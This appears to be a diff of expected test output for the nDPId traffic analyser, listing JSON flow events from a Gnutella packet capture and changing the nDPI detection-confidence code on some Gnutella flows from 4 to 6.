00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.172.10.90","src_port":28681,"dst_port":40162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.172.10.90","src_port":28681,"dst_port":40162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287312,"flow_last_seen":287312,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"136.32.84.139","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287312,"flow_last_seen":287312,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"136.32.84.139","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":28681,"dst_port":1630,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3258,7 +3258,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287443,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287624,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.93.150.146","src_port":28681,"dst_port":62507,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287624,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.93.150.146","src_port":28681,"dst_port":62507,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53516,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53516,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.18.211.177","src_port":28681,"dst_port":18085,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3287,7 +3287,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287342,"flow_last_seen":288307,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":28681,"dst_port":33527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.36.234.196","src_port":28681,"dst_port":11629,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.36.234.196","src_port":28681,"dst_port":11629,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287599,"flow_last_seen":287599,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52669,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287599,"flow_last_seen":287599,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52669,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":28681,"dst_port":1512,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3296,7 +3296,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287622,"flow_last_seen":287622,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":8349,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287869,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.203.72.224","src_port":28681,"dst_port":9897,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287869,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.203.72.224","src_port":28681,"dst_port":9897,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":28681,"dst_port":62234,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":28681,"dst_port":62234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287429,"flow_last_seen":287429,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53707,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3335,7 +3335,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251765,"flow_last_seen":287317,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.35.66.21","src_port":28681,"dst_port":22234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.64.156.63","src_port":28681,"dst_port":60092,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.64.156.63","src_port":28681,"dst_port":60092,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":28681,"dst_port":49803,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":28681,"dst_port":49803,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287526,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":28681,"dst_port":37814,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3370,7 +3370,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251766,"flow_last_seen":287317,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.127.26.138","src_port":28681,"dst_port":3083,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287310,"flow_last_seen":287310,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"8.44.149.207","src_port":28681,"dst_port":30551,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287310,"flow_last_seen":287310,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"8.44.149.207","src_port":28681,"dst_port":30551,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 